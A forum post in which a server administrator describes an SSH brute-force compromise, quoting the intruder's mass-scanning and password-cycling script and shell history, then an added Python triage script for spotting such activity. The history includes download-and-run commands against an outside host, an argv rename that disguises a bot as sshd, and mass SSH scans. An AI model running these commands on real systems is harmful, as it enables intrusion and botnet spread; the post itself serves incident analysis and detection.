Back again after one tough night inspecting the whole server....
And indeed there was an account with too poor a password, so I changed it to a strong one, killed the process and dropped SSH via iptables... And now that's fine after one night...
Still looking for a rootkit, but it seems to be safe, as it tried to brute-force the root account, which of course has a strong password.
Just for info, here is the script that was running:
go.sh:
Code:
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt
ssh-scan:
Code:
#!/bin/bash
clear
rm -rf $1.ps.$2
echo "#=====#==================================#=====#"
echo "#= R =# SSH AUTO SCANNER BY REGELE & CO #= R =#"
echo "#= E =#------- #BlackCat TEAM -------#= E =#"
echo "#= G =#----------------------------------#= G =#"
echo "#= E =# ® ALL RIGHTS RESERVED TO Regele ®#= E =#"
echo "#= L =# Now Just Sit Back End Relax #= L =#"
echo "#= E =# IPs founder... ACTIVATING!!! #= E =#"
echo "#Range from -> $1.0.0"
echo "#Range to -> $1.255.255"
echo "#Looking on -> PORT $2"
./ps $1 $2
sleep 5
cat $1.ps.$2 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
sleep 5
echo "#---Relax ... Take it Easy---#"
cat 1 > pass_file
sleep 3
./ssh 150
cat 2 > pass_file
sleep 3
./ssh 150
...
...
...
cat 63 > pass_file
sleep 3
./ssh 150
cat 64 > pass_file
sleep 3
./ssh 150
echo "# It's over, you cand go outside and play now #"
.history of the user:
Code:
15 cd /var/tmp
16 ls -a
17 /sbin/ifconfig |grep inet
18 wget http://213.131.252.251/japjap/mech.tgz ; tar zxvf mech.tgz ; cd flash ; ./h -s "/usr/sbin/sshd" ./mech ; cd .. ; rm -rf flash mech.tgz
19 cat /proc/cpuinfo
20 nuame -a
21 uname -a
22 wget arhive.blajan.org/2009.tgz
23 tar zxvf
24 wget arhive.blajan.org/xpl.tgz
25 wget http://213.131.252.251/japjap/irc.tgz ; tar zxvf irc.tgz ; rm -rf irc.tgz ; cd irc ; ./x 66.252 22
26 ./x 194.0 22;./x 194.1 22;./x 194.2 22;./x 194.3 22;./x 194.4 22;./x 194.5 22;./x 194.6 22;./x 194.7 22;./x 194.8 22;./x 194.9 22;./x 194.10 22;./x 194.11 22;./x 194.12 22;./x 194.13 22;./x 194.14 22;./x 194.15 22;./x 194.16 22;./x 194.17 22;./x 194.18 22;./x 194.19 22;./x 194.20 22;./x 194.21 22;./x 194.22 22;./x 194.23 22;./x 194.24 22;./x 194.25 22;./x 194.26 22;./x 194.27 22;./x 194.28 22;./x 194.29 22;./x 194.30 22;./x 194.31 22;./x 194.32 22;./x 194.33 22;./x 194.34 22;./x 194.35 22;./x 194.36 22;./x 194.37 22;./x 194.38 22;./x 194.39 22;./x 194.40 22;./x 194.41 22;./x 194.42 22;./x 194.43 22;./x 194.44 22;./x 194.45 22;./x 194.46 22;./x 194.47 22;./x 194.48 22;./x 194.49 22;./x 194.50 22
27 ls
28 rm -rf 194*
29 cat vuln.txt
30 ls
31 rm -rf vuln.txt
32 ls
33 ./x 78.24 22
34 w
35 ps x
36 w
37 cd /var/tmp
38 ls -a
39 cd irc
40 ls
41 cat vuln.txt
42 w
43 ps x
44 cd /var/tmp
45 /sbin/ifconfig |grep inet
46 wget http://213.131.252.251/japjap/mech.tgz ; tar zxvf mech.tgz ; cd flash ; ./h -s "/usr/sbin/sshd" ./mech ; cd .. ; rm -rf flash mech.tgz
47 ls
48 cd irc
49 ls
50 cat vuln.txt
51 rm -rf vuln.txt
52 cd ..
53 rm -rf irc
54 wget http://213.131.252.251/japjap/r.tgz ; tar zxvf r.tgz ; rm -rf r.tgz ; cd boss ; ls
55 ls
56 ./x 78.24 22
57 ls
58 cat vuln.txt
59 ./x 72.52 22
So, well, the segfaults are really strange indeed. I think that the segmentation fault comes from inside the Ubuntu server: once he corrupted the user, he tried from the inside... Well, just a guess.
Thanks anyway !
Ciao,
Sismon
PS: Obviously he was using /var/tmp to write everything...
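Two things in the history above are worth turning into a repeatable check: the attacker staged everything under /var/tmp (fetch a .tgz, unpack it, run it, delete the archive), and the `./h -s "/usr/sbin/sshd" ./mech` step renames the bot's process so `ps` shows it as sshd. The following is an added triage script, not the poster's code and not part of the attacker's kit; it scans a shell history for that fetch/unpack/run-from-tmp pattern and compares what a process claims in its command line with the binary the kernel actually started (`/proc/<pid>/exe`). The sample history and process list are constructed for the example (the IP is from the TEST-NET range, not the one in the post); `read_live_procs()` does the same comparison against a real Linux `/proc`.

```python
"""Post-compromise triage helpers (added example, not the forum poster's code).

1. flag_history_lines(): find history entries that download an archive, unpack
   it, clean up after themselves, or work out of a world-writable directory.
2. find_masqueraders(): spot processes whose argv[0] claims one path while
   /proc/<pid>/exe points somewhere else, runs from /tmp or /var/tmp, or
   whose binary was deleted from disk while still running.
"""
import os
import re
from dataclasses import dataclass

SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
FETCH_RE = re.compile(r"\b(wget|curl)\s+\S+\.(tgz|tar\.gz|tar|zip)\b")
UNPACK_RE = re.compile(r"\btar\s+[a-z]*x[a-z]*\b")
CLEANUP_RE = re.compile(r"\brm\s+-rf\b")
TMP_CD_RE = re.compile(r"\bcd\s+/(var/)?tmp\b")


@dataclass
class Finding:
    line_no: int
    reason: str
    text: str


def flag_history_lines(history_text: str) -> list[Finding]:
    """Return one Finding per history line that matches the staging pattern."""
    findings = []
    for no, line in enumerate(history_text.splitlines(), 1):
        reasons = []
        if FETCH_RE.search(line):
            reasons.append("downloads an archive")
        if UNPACK_RE.search(line):
            reasons.append("unpacks an archive")
        if CLEANUP_RE.search(line) and FETCH_RE.search(line):
            reasons.append("deletes the archive it just fetched")
        if TMP_CD_RE.search(line):
            reasons.append("works in a world-writable directory")
        if reasons:
            findings.append(Finding(no, "; ".join(reasons), line.strip()))
    return findings


@dataclass
class ProcInfo:
    pid: int
    cmdline: str  # what `ps` shows; the process can rewrite this itself
    exe: str      # readlink of /proc/<pid>/exe; maintained by the kernel


def find_masqueraders(procs: list[ProcInfo]) -> list[tuple[int, str]]:
    """Return (pid, reason) for every process whose claimed identity is doubtful."""
    hits = []
    for p in procs:
        reasons = []
        real = p.exe
        if real.endswith(" (deleted)"):  # binary unlinked while running (rm -rf flash)
            reasons.append("binary deleted from disk while still running")
            real = real[: -len(" (deleted)")]
        argv0 = p.cmdline.split(" ", 1)[0] if p.cmdline else ""
        if real.startswith(SUSPECT_DIRS):
            reasons.append(f"runs from world-writable location {real}")
        elif argv0.startswith("/") and os.path.realpath(argv0) != real:
            # realpath() tolerates legitimate symlinked binaries; a plain
            # mismatch means argv[0] was faked (e.g. the "-s /usr/sbin/sshd" trick)
            reasons.append(f"argv[0] claims {argv0} but binary is {real}")
        if reasons:
            hits.append((p.pid, "; ".join(reasons)))
    return hits


def read_live_procs() -> list[ProcInfo]:
    """Collect ProcInfo from /proc (Linux; run as root to read every exe link)."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                argv = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue  # kernel thread, process exited, or no permission
        procs.append(ProcInfo(pid, " ".join(argv), exe))
    return procs


# Constructed sample data modelled on the history in the post (TEST-NET address).
SAMPLE_HISTORY = """cd /var/tmp
ls -a
wget http://192.0.2.10/japjap/mech.tgz ; tar zxvf mech.tgz ; cd flash ; ./h -s "/usr/sbin/sshd" ./mech ; cd .. ; rm -rf flash mech.tgz
cat /proc/cpuinfo
uname -a
"""
SAMPLE_PROCS = [
    ProcInfo(611, "/usr/sbin/sshd -D", "/usr/sbin/sshd"),              # genuine daemon
    ProcInfo(4120, "sshd: root@pts/0", "/usr/sbin/sshd"),              # genuine session
    ProcInfo(4302, "/usr/sbin/sshd", "/var/tmp/flash/mech (deleted)"),  # renamed bot
    ProcInfo(4310, "/usr/sbin/sshd", "/home/bob/.x/ss"),               # faked argv[0]
    ProcInfo(4355, "/var/tmp/irc/x 78.24 22", "/var/tmp/irc/x"),       # scanner from tmp
]

if __name__ == "__main__":
    for f in flag_history_lines(SAMPLE_HISTORY):
        print(f"history line {f.line_no}: {f.reason}: {f.text}")
    for pid, why in find_masqueraders(read_live_procs() or SAMPLE_PROCS):
        print(f"pid {pid}: {why}")
```

The process check deliberately trusts only the kernel-maintained `exe` link; `ps` output and `/proc/<pid>/cmdline` are both under the process's own control, which is exactly what the `-s` rename exploits. A hit on "binary deleted while still running" is the signature of the `rm -rf flash` cleanup in the history: the bot keeps running from memory after its file is gone, so a disk-only scan will not find it.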